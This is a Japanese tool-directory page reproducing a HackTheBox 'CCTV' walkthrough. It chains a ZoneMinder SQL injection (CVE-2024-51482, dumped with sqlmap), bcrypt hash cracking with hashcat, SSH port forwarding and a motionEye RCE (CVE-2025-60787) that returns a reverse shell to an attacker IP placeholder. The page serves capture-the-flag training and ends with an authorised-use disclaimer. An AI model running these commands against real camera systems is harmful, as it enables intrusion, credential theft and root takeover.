Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cctv — HackTheBox CCTVのwalkthrough。CVE-2024-51482 ZoneMinder SQLインジェクション、bcryptハッシュクラッキング、CVE-2025-60787 motionEye RCEを連鎖させてrootを取得する。 | Kitploit
ツール/GitHubGitHub/ledksv/cctv
パスワードクラッキング特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育ラボと実践
GitHubledksv/cctv

cctv

HackTheBox CCTVのwalkthrough。CVE-2024-51482 ZoneMinder SQLインジェクション、bcryptハッシュクラッキング、CVE-2025-60787 motionEye RCEを連鎖させてrootを取得する。

10時間51分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

CCTV — HackTheBox ウォークスルー

プラットフォーム: HackTheBox | OS: Linux

攻撃チェーン

CVE-2024-51482 を悪用した ZoneMinder の SQL インジェクションにより、データベースから bcrypt ハッシュが漏洩する。hashcat でクラックすると SSH アクセスが得られる。ポートフォワーディングで露出した内部の motionEye インスタンスは CVE-2025-60787 に脆弱であり、root シェルを取得できる。

列挙

root@kitploit:~
nmap -sV -sC 10.129.53.160 -Pn

22/tcp open  ssh     OpenSSH 9.6p1 (Ubuntu)
80/tcp open  http    Apache 2.4.58 — SecureVision CCTV & Security Solutions

/etc/hosts に cctv.htb を追加した。ポート 80 では ZoneMinder のインストールが稼働していた。

CVE-2024-51482 — ZoneMinder SQL インジェクション

CVE-2024-51482 は ZoneMinder のログインエンドポイントにおける SQL インジェクション脆弱性である。username パラメータがサニタイズされておらず、データベースの抽出が可能となる。

root@kitploit:~
sqlmap -u "http://cctv.htb/zm/index.php" \
  --data="username=admin&password=admin&action=login" \
  --dbms=mysql --dump --batch

users テーブルから bcrypt パスワードハッシュを抽出した。

ハッシュクラッキング

root@kitploit:~
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt

パスワードをクラックした。

SSH 足がかり

root@kitploit:~
ssh <user>@10.129.53.160

user フラグを取得した。内部サービスを確認した。

root@kitploit:~
ss -tlnp
# 127.0.0.1:8765 — motionEye CCTV management panel

ポートをフォワーディングした。

root@kitploit:~
ssh -L 8765:127.0.0.1:8765 <user>@10.129.53.160

CVE-2025-60787 — motionEye RCE

CVE-2025-60787 は motionEye における認証済み RCE である。内部パネルへのアクセスがあれば、任意のコマンドが root として実行される。

root@kitploit:~
nc -lvnp 4444
python3 exploit_CVE-2025-60787.py --url http://127.0.0.1:8765 --lhost <ATTACKER_IP> --lport 4444

root シェルを取得した。root フラグは /root/root.txt にある。


教育目的のみ。所有しているか、明示的なテスト許可を得たシステムのみをテストすること。

ツールをダウンロード